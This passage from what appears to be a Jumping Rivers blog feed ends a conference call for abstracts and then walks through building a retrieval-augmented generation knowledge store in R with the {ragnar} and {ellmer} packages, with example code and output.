&lt;p&gt;Preparing a talk is a forcing function for documentation. To explain your system to strangers, you have to articulate what&amp;rsquo;s currently tacit. That articulation becomes something your team can use: onboarding material, decision records, runbooks.&lt;/p&gt;
&lt;p&gt;Speaking also distributes responsibility. When you present work publicly, it stops being just yours. Your team shares ownership of the ideas. Others can critique, extend, or maintain them. This is particularly valuable for platform teams or infrastructure work, where the people who built something may not be the ones operating it six months later.&lt;/p&gt;
&lt;h2 id="turning-tacit-knowledge-into-reusable-material"&gt;Turning Tacit Knowledge into Reusable Material&lt;/h2&gt;
&lt;p&gt;Much of what you know about your production systems isn&amp;rsquo;t written down. You understand the failure modes, the workarounds, and the operational quirks. You know which metrics matter and which are noise. You remember why you made certain tradeoffs.&lt;/p&gt;
&lt;p&gt;A conference talk is an excuse to capture that knowledge. The slides become a reference. The abstract becomes a design document. The Q&amp;amp;A reveals what wasn&amp;rsquo;t clear and needs better documentation.&lt;/p&gt;
&lt;p&gt;Even if the talk itself is ephemeral, the process of preparing it leaves artefacts. You&amp;rsquo;ve already done the hard work of running the system. Speaking about it turns that experience into something others can learn from, and you can build on.&lt;/p&gt;
&lt;h2 id="your-work-is-worth-sharing"&gt;Your Work Is Worth Sharing&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re maintaining AI systems in production, you&amp;rsquo;re solving problems worth talking about: making models reliable under load, keeping training pipelines maintainable, monitoring behaviour when ground truth is delayed or absent, and managing technical debt while shipping features.&lt;/p&gt;
&lt;p&gt;These are the problems practitioners face every day. Your approach won&amp;rsquo;t be perfect, and that&amp;rsquo;s the point. Talks about work in progress, about things that didn&amp;rsquo;t work, about compromises made under constraint are often more useful than polished success stories.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re looking for honest accounts of how people are actually building and operating AI systems. That might fit the engineering stream (deployment, infrastructure, monitoring, scaling) or the machine learning stream (training, evaluation, model behaviour, responsible data use). If you&amp;rsquo;re doing work in either area, you have something to contribute.&lt;/p&gt;
&lt;h2 id="submit-an-abstract"&gt;Submit an Abstract&lt;/h2&gt;
&lt;p&gt;The deadline is &lt;strong&gt;23rd January&lt;/strong&gt;. You&amp;rsquo;ll need a title and an abstract of up to 250 words. You don&amp;rsquo;t need a perfect story or a finished project. You need a problem you&amp;rsquo;ve worked on, some approaches you&amp;rsquo;ve tried, and some lessons you&amp;rsquo;ve learned.&lt;/p&gt;
&lt;p&gt;Think about what would be useful for someone six months behind you on a similar path. Think about what you wish someone had told you before you started. Think about the conversation you&amp;rsquo;d want to have with peers who understand the constraints you&amp;rsquo;re working under.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re not sure where to start, consider writing about one decision that shaped your system, one assumption that turned out to be wrong, or one constraint that changed your design. Good abstracts often start with a specific moment or choice rather than a broad overview.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ready to submit? The deadline is &lt;strong&gt;23rd January&lt;/strong&gt;. Share one decision, one lesson, or one constraint from your production work:&lt;br&gt;
&lt;a href="https://jumpingrivers.com/ai-production/" rel="external"&gt;https://jumpingrivers.com/ai-production/&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you have questions about whether your work fits the conference, reach out at &lt;a href="mailto:events@jumpingrivers.com" rel="external"&gt;&lt;strong&gt;events@jumpingrivers.com&lt;/strong&gt;&lt;/a&gt;. We&amp;rsquo;re here to help make this easier.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-submit-ai-in-production/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Retrieval-Augmented Generation: Setting up a Knowledge Store in R</title><link>https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/</link><pubDate>Thu, 08 Jan 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Happy New Year from the team at Jumping Rivers!&lt;/p&gt;
&lt;p&gt;Now that we’re well into the second half of the 2020s, it’s a good time to
reflect on the changes that we have seen so far in this decade. In the
world of data science nothing has dominated headlines quite like the
rapid growth and uptake of generative artificial intelligence (GenAI).&lt;/p&gt;
&lt;p&gt;Large language models (LLMs) such as ChatGPT, Claude and Gemini have
incredible potential to streamline day-to-day tasks, whether that’s
processing vast amounts of information, providing a human-like chat
interface for customers or generating code. But they also come with
notable risks if not harnessed responsibly.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Anyone who has interacted with these models is likely to have come
across &lt;strong&gt;hallucination&lt;/strong&gt;, where the model confidently presents false
information as though it is factually correct. This can happen for a
variety of reasons:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LLMs often have no access to real-time information: how would a model
that was trained last year know today’s date?&lt;/li&gt;
&lt;li&gt;The training data may be missing domain-specific information: can we
really trust an off-the-shelf model to have a good understanding of
pharmaceuticals and medicinal drugs?&lt;/li&gt;
&lt;li&gt;The model may be over-eager to come across as intelligent, so it
decides to provide a confident output rather than a more nuanced,
honest answer.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Often we need to give the model access to additional contextual
information before we can make it “production-ready”. We can achieve
this using a &lt;strong&gt;retrieval-augmented generation (RAG)&lt;/strong&gt; workflow. In this
blog post we will explore the steps involved and set up an example RAG
workflow using free and open source packages in R.&lt;/p&gt;
&lt;h2 id="what-is-rag"&gt;What is RAG?&lt;/h2&gt;
&lt;p&gt;In a typical interaction with an LLM we have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;A user prompt: the text that is submitted by the user.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;A response: the text that is returned by the LLM.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;(optional)&lt;/em&gt; A system prompt: additional instructions for how the LLM
should respond (for example,
&lt;code&gt;&amp;quot;You respond in approximately 10 words or less&amp;quot;&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In a RAG workflow we provide access to an external knowledge store which
can include text-based documents and webpages. Additional contextual
info is then retrieved from the knowledge store (hence &lt;strong&gt;“retrieval”&lt;/strong&gt;)
and added to the user prompt before it is sent. In doing so we can
expect to receive a higher quality output.&lt;/p&gt;
&lt;h2 id="how-does-it-work"&gt;How does it work?&lt;/h2&gt;
&lt;p&gt;Before going further, we must first introduce the concept of
&lt;strong&gt;vectorisation&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Contrary to what you might believe, LLMs do not understand non-numerical
text! They are mathematical models, meaning they can only ingest and
output numerical vectors.&lt;/p&gt;
&lt;p&gt;So how can a user interact with a model using plain English? The trick
is that mappings exist which are able to convert between numerical
vectors and text. These mappings are called “vector embeddings” and are
used to convert the user prompt into a vector representation before it
is passed to the LLM.&lt;/p&gt;
&lt;p&gt;So, when setting up our RAG knowledge store, we have to store the
information using a compatible vector representation. With this in mind,
let’s introduce a typical RAG workflow:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Content&lt;/strong&gt;: we decide which documents to include in the knowledge
store.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Extraction&lt;/strong&gt;: we extract the text from these documents in Markdown
format.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Chunking&lt;/strong&gt;: the Markdown content is split into contextual “chunks”
(for example, each section or subsection of a document might become
a chunk).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Vectorisation&lt;/strong&gt;: the chunks are “vectorised” (i.e. we convert them
into a numerical vector representation).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Index&lt;/strong&gt;: we create an index for our knowledge store which will be
used to retrieve relevant chunks of information.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Retrieval&lt;/strong&gt;: we register the knowledge store with our model
interface. Now, when a user submits a prompt, it will be combined
with relevant chunks of information before it is ingested by the
model.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;At the retrieval step, a matching algorithm is typically used so that
only highly relevant chunks are retrieved from the knowledge store. In
this way, we are able to keep the size of the user prompts (and any
incurred costs) to a minimum.&lt;/p&gt;
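&lt;p&gt;To give a feel for how such matching can work, the toy example below ranks two chunks by cosine similarity, one common way of comparing vectors. The three-element vectors and chunk names are invented for illustration (real embeddings have hundreds or thousands of dimensions), and the ranking that {ragnar} applies internally may differ.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Cosine similarity: close to 1 when two vectors point the same way
cosine_similarity = function(a, b) {
  sum(a * b) / (sqrt(sum(a^2)) * sqrt(sum(b^2)))
}

# Made-up vector representations of two chunks and a user prompt
chunk_vectors = list(
  authors = c(0.9, 0.1, 0.0),
  installation = c(0.1, 0.8, 0.3)
)
prompt_vector = c(0.8, 0.2, 0.1)

# Score every chunk against the prompt and keep the best match
scores = vapply(chunk_vectors, cosine_similarity, numeric(1), b = prompt_vector)
names(which.max(scores))
#&amp;gt; [1] &amp;#34;authors&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;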
&lt;h2 id="setting-up-a-rag-workflow-in-r"&gt;Setting up a RAG workflow in R&lt;/h2&gt;
&lt;p&gt;We will make use of two packages which are available to install via the
&lt;a href="https://cran.r-project.org/" rel="external"&gt;Comprehensive R Archive Network (CRAN)&lt;/a&gt;.
Both are actively maintained by &lt;a href="https://posit.co/homepage-b/" rel="external"&gt;Posit&lt;/a&gt;
(formerly RStudio) and are free to install and use.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2026-retrieval-augmented-generation-database-workflow-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="ragnar"&gt;{ragnar}&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://ragnar.tidyverse.org/" rel="external"&gt;{ragnar}&lt;/a&gt; package provides functions
for extracting information from both text-based documents and webpages,
and provides vector embeddings that are compatible with popular LLM
providers including OpenAI and Google.&lt;/p&gt;
&lt;p&gt;We will use {ragnar} to build our knowledge store.&lt;/p&gt;
&lt;h3 id="ellmer"&gt;{ellmer}&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://ellmer.tidyverse.org/" rel="external"&gt;{ellmer}&lt;/a&gt; package allows us to
interact with a variety of LLM APIs from R. A complete list of supported
model providers can be found in the &lt;a href="https://ellmer.tidyverse.org/#providers" rel="external"&gt;package
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Note that, while {ellmer} is free to install and use, you will still
need to set up an API token with your preferred model provider before
you can interact with any models. We will use the free Google Gemini
tier for our example workflow. See the &lt;a href="https://ai.google.dev/gemini-api/docs/api-key" rel="external"&gt;Gemini API
documentation&lt;/a&gt; for
instructions on creating an API key, and the &lt;a href="https://ellmer.tidyverse.org/reference/chat_google_gemini.html" rel="external"&gt;{ellmer}
documentation&lt;/a&gt;
for authenticating with your API key from R.&lt;/p&gt;
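&lt;p&gt;As a quick check that authentication works, a minimal sketch might look like the following. It assumes your key is stored in the &lt;code&gt;GOOGLE_API_KEY&lt;/code&gt; environment variable; check the {ellmer} documentation linked above for the variable name your installed version expects. The question text is just an example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ellmer&amp;#34;)

# Assumes the API key is available as an environment variable,
# for example set in your .Renviron file
chat = chat_google_gemini(
  system_prompt = &amp;#34;You respond in approximately 10 words or less&amp;#34;
)

# Send a user prompt and print the model response
chat$chat(&amp;#34;What is retrieval-augmented generation?&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;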
&lt;h2 id="example-rag-workflow"&gt;Example RAG workflow&lt;/h2&gt;
&lt;p&gt;We begin by loading the {ragnar} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ragnar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The URL provided below links to the &lt;a href="https://csgillespie.github.io/efficientR/" rel="external"&gt;title
page&lt;/a&gt; of the “Efficient R
Programming” textbook, written by Robin Lovelace and our very own Colin
Gillespie. We’re going to use a couple of chapters from the book to
construct a RAG knowledge store.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://csgillespie.github.io/efficientR/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s use {ragnar} to read the contents of this page into a Markdown
format.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;md &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_as_markdown&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We could vectorise this information as it is, but first we should split
it up into contextual chunks.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chunks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;markdown_chunk&lt;/span&gt;(md)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chunks
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # @document@origin: https://csgillespie.github.io/efficientR/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2 × 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; start end context text &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; * &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 1 1572 &amp;#34;&amp;#34; &amp;#34;# Efficient R programmin…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 597 2223 &amp;#34;# Welcome to Efficient R Programming&amp;#34; &amp;#34;## Authors\n\n[Colin Gil…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The chunks are stored in a tibble format, with one row per chunk. The
&lt;code&gt;text&lt;/code&gt; column stores the chunk text (in the interests of saving space we
have only included the start of each chunk in the printed output above).&lt;/p&gt;
&lt;p&gt;The title page has been split into two chunks and we can see that there
is significant overlap (chunk 1 spans characters 1 to 1572 and chunk 2
spans characters 597 to 2223). Overlapping chunks are perfectly normal
and provide added context as to where each chunk sits relative to the
other chunks.&lt;/p&gt;
&lt;p&gt;Note that you can visually inspect the chunks by running
&lt;code&gt;ragnar_chunks_view(chunks)&lt;/code&gt;.&lt;/p&gt;
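&lt;p&gt;If the default chunks are too coarse for your documents, the chunk size and overlap can be tuned. The sketch below assumes the &lt;code&gt;target_size&lt;/code&gt; and &lt;code&gt;target_overlap&lt;/code&gt; arguments described in the &lt;code&gt;markdown_chunk()&lt;/code&gt; help page for recent {ragnar} releases; the values chosen here are arbitrary, so check &lt;code&gt;?markdown_chunk&lt;/code&gt; for your installed version.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumed arguments: target_size (approximate characters per chunk) and
# target_overlap (fraction of overlap between neighbouring chunks)
smaller_chunks = markdown_chunk(md, target_size = 800, target_overlap = 0.25)
smaller_chunks
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;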
&lt;p&gt;It’s time to build our knowledge store with a vector embedding that is
appropriate for Google Gemini models.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Initialise a knowledge store with the Google Gemini embedding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;store &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; embed &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;embed_google_gemini&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Insert the Markdown chunks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_insert&lt;/span&gt;(store, chunks)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The Markdown chunks are automatically converted into a vector
representation at the insertion step. It is important to choose the
vector embedding carefully when we create the store, because queries must
be embedded in the same way as the stored chunks. Vectors produced by an
OpenAI embedding cannot be meaningfully compared with vectors produced by
a Google Gemini embedding!&lt;/p&gt;
&lt;p&gt;Before we can retrieve information from our store, we must create a
store index.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_build_index&lt;/span&gt;(store)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now test the retrieval capabilities of our knowledge store using
the &lt;code&gt;ragnar_retrieve()&lt;/code&gt; function. For example, to retrieve any chunks
relevant to the text &lt;strong&gt;Who are the authors of “Efficient R
Programming”?&lt;/strong&gt; we can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_retrieve&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; store,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Who are the authors of \&amp;#34;Efficient R Programming\&amp;#34;?&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 1 × 9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; origin doc_id chunk_id start end cosine_distance bm25 context text &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;lis&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 https://csgi… 1 &amp;lt;int&amp;gt; 1 2223 &amp;lt;dbl [2]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;&amp;#34; &amp;#34;# E…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the backslashes (&lt;code&gt;\&lt;/code&gt;) in &lt;code&gt;\&amp;quot;Efficient R Programming\&amp;quot;&lt;/code&gt; escape the
inner double quotes so that they are treated as part of the character string.&lt;/p&gt;
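&lt;p&gt;As a quick check, the base R snippet below shows three equivalent ways
of writing the same string. The variable names are just for illustration,
and the raw string syntax requires R 4.0.0 or later.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Escaped double quotes inside a double-quoted string
escaped = &amp;#34;Who are the authors of \&amp;#34;Efficient R Programming\&amp;#34;?&amp;#34;

# Single quotes on the outside, so no escaping is needed
single = &amp;#39;Who are the authors of &amp;#34;Efficient R Programming&amp;#34;?&amp;#39;

# Raw string (R 4.0.0 or later)
raw = r&amp;#34;(Who are the authors of &amp;#34;Efficient R Programming&amp;#34;?)&amp;#34;

# All three are the same string
identical(escaped, single)
identical(escaped, raw)

# print() displays the escapes, writeLines() displays the actual characters
print(escaped)
writeLines(escaped)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The backslashes only appear in the source code and in the output of
&lt;code&gt;print()&lt;/code&gt;; they are not stored in the string itself.&lt;/p&gt;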
&lt;p&gt;Without going into too much detail, the &lt;code&gt;cosine_distance&lt;/code&gt; and &lt;code&gt;bm25&lt;/code&gt;
columns in the returned tibble provide information relating to the
matching algorithm used to identify the chunks. The other columns relate
to the location and content of the chunks.&lt;/p&gt;
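&lt;p&gt;For some intuition about the first of these columns, cosine distance
measures how far apart the directions of two embedding vectors are. The
base R sketch below uses made-up three-dimensional vectors (real
embeddings have many more dimensions) and a hypothetical helper function;
it is not the code that {ragnar} runs internally. The &lt;code&gt;bm25&lt;/code&gt; column
relates to BM25, a ranking score based on keyword matches rather than
embeddings.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Cosine distance = 1 - cosine similarity (hypothetical helper)
cosine_distance = function(a, b) {
  1 - sum(a * b) / (sqrt(sum(a^2)) * sqrt(sum(b^2)))
}

# Made-up &amp;#34;embeddings&amp;#34; for a query and two chunks
query = c(1, 2, 0)
chunk_a = c(2, 4, 0) # points in the same direction as the query
chunk_b = c(0, 0, 5) # orthogonal to the query

cosine_distance(query, chunk_a) # approximately 0: a close match
cosine_distance(query, chunk_b) # 1: unrelated to the query
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A smaller cosine distance therefore indicates a chunk whose embedding is
closer to that of the query text.&lt;/p&gt;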
&lt;p&gt;From the output tibble we see that the full content of the title page
(characters 1 to 2223) has been returned. This is because both of the
original chunks contained information about the authors, and the two
overlapping chunks have been merged into a single result.&lt;/p&gt;
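&lt;p&gt;One way to picture how two overlapping chunks (characters 1 to 1572 and
597 to 2223) can come back as a single span is the toy base R helper
below. The function &lt;code&gt;merge_ranges()&lt;/code&gt; is hypothetical and written purely
for illustration; we are assuming that overlapping matches are combined,
and the internals of {ragnar} may differ.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Toy sketch: merge character ranges that overlap (hypothetical helper)
merge_ranges = function(start, end) {
  ord = order(start)
  start = start[ord]
  end = end[ord]
  merged_start = start[1]
  merged_end = end[1]
  for (i in seq_along(start)[-1]) {
    n = length(merged_end)
    if (start[i] &amp;lt;= merged_end[n]) {
      # Overlaps the current range, so extend it
      merged_end[n] = max(merged_end[n], end[i])
    } else {
      # No overlap, so start a new range
      merged_start = c(merged_start, start[i])
      merged_end = c(merged_end, end[i])
    }
  }
  data.frame(start = merged_start, end = merged_end)
}

# The two title page chunks collapse into one range
merge_ranges(start = c(1, 597), end = c(1572, 2223))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;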
&lt;p&gt;Let’s add a more technical chapter from the textbook to the knowledge
store. The URL provided below links to &lt;a href="https://csgillespie.github.io/efficientR/performance.html" rel="external"&gt;Chapter 7 (“Efficient
Optimisation”)&lt;/a&gt;.
Let’s add this to the knowledge store and rebuild the index.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://csgillespie.github.io/efficientR/performance.html&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Extract Markdown content and split into chunks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chunks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_as_markdown&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;markdown_chunk&lt;/span&gt;()
